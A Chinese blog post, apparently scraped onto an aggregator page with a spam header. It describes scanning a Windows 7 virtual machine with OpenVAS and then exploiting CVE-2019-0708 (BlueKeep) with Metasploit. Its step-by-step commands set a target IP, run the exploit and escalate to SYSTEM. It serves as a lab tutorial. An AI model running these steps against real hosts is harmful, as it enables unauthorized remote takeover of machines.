日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 >

avws扫描出来的漏洞怎么利用_漏洞扫描利用

發布時間:2024/9/19 29 豆豆
生活随笔 收集整理的這篇文章主要介紹了 avws扫描出来的漏洞怎么利用_漏洞扫描利用 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

聲明:禁止用作非法目的,謝絕一切形式的轉載。

在這里對OpenVas進行了簡單的介紹。這篇文章著重介紹通過OpenVas掃描出來漏洞之后,如何利用這些漏洞達到獲取被入侵機器"肉雞"的shell(也就是控制權)。

OpenVas

GSM協議

NTP – Time synchronization ? Connecting to 123/udp ? Mandatory ? Not encrypted ? May use internal NTP server Feeds (see below) ? Direct

  • Connecting to 24/tcp or 443/tcp
  • Direct internet access required

? Via proxy

  • Connecting to internal HTTP proxy supporting CONNECT method on configurable port

? Connecting to apt.greenbone.net and feed.greenbone.net ? Mandatory on stand-alone and master appliances ? Used protocol is SSH ? Encrypted and bidirectionally authenticated via SSH

  • Server: public key
  • Client: public key

術語

Alert: An alert is an action which can be triggered by certain events. In most cases, this means the output of a notification, e.g., an e-mail in case of new found vulnerabilities.

CVE: Common Vulnerabilities and Exposures (CVE) is a dictionary of publicly known information security vulnerabilities and exposures.

QoD: The Quality of Detection (QoD) is a value between 0 % and 100 % describing the reliability of the executed vulnerability detection or product detection.

OpenVas掃描

通過"Configuration"設置掃描目標(本文使用Vmware虛擬機 Win7 64 SP1操作系統), 通過"Scan" 設置掃描任務。掃描結果如下:

查看nginx條目(Vmware虛擬機 Win7 64 SP1操作系統)報告信息:

從掃描結果中可以看出存在CVE-2019-0708漏洞,這是一個由微軟的RDP服務引起的任意代碼執行漏洞,漏洞的詳細信息如下。

漏洞利用

  • 開啟msf
  • msfconsole
  • 搜索模塊
  • search cve-2019-0708
  • 選擇攻擊模塊
  • use 1
  • 選擇攻擊目標
  • show targets set target 2
  • 設置遠程目標ip
  • set rhost 192.168.42.148
  • 執行
  • exploit

    通過getsystem提權獲得最高權限system,然后就真的可以為所欲為了。

    寫在最后

    Win7系統的漏洞還是很多的,目前微軟已經停止了對Win7系統的維護,使用Win7系統要謹慎。當然這并不能說明win10系統就安全了,漏洞也是多的可怕。

    對于遠程桌面,謹慎開啟。3389這個端口,無論在微軟的那個系統中,都是漏洞泛濫之地。

    公眾號

    更多內容,歡迎關注我的微信公眾號:無情劍客。

    總結

    以上是生活随笔為你收集整理的avws扫描出来的漏洞怎么利用_漏洞扫描利用的全部內容,希望文章能夠幫你解決所遇到的問題。

    如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。